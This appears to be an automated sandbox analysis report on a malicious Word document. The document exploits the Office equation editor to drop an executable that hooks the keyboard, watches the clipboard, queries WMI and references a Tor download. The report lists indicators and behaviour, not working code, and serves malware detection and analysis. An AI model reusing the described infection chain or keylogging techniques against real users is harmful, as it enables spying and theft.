Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: poiuytrewsdfghjklmnbvcx.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350007415.0000000002B13000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350002166.0000000002B0F000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp	String found in binary or memory: https://xWUrFiDn0aBmFXBFM.net

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3DA6FFF0u002d7A4Cu002d4354u002dA44Au002d80CFFE9AEF36u007d/C8F0ECA3u002d36A1u002d4690u002d8D13u002d6EC07C1D3DE8.cs

Large array initialization: .cctor: array initializer size 11944

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 4_2_011E415D	4_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 5_2_011E415D	5_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00402296	6_2_00402296
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00225330	6_2_00225330
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00226348	6_2_00226348
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_0022CB50	6_2_0022CB50
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00222089	6_2_00222089
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00225678	6_2_00225678

Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCC34.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Pending Orders Statement -40064778.doc	Virustotal: Detection: 41%
Source: Pending Orders Statement -40064778.doc	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
Source:	Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source:	Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
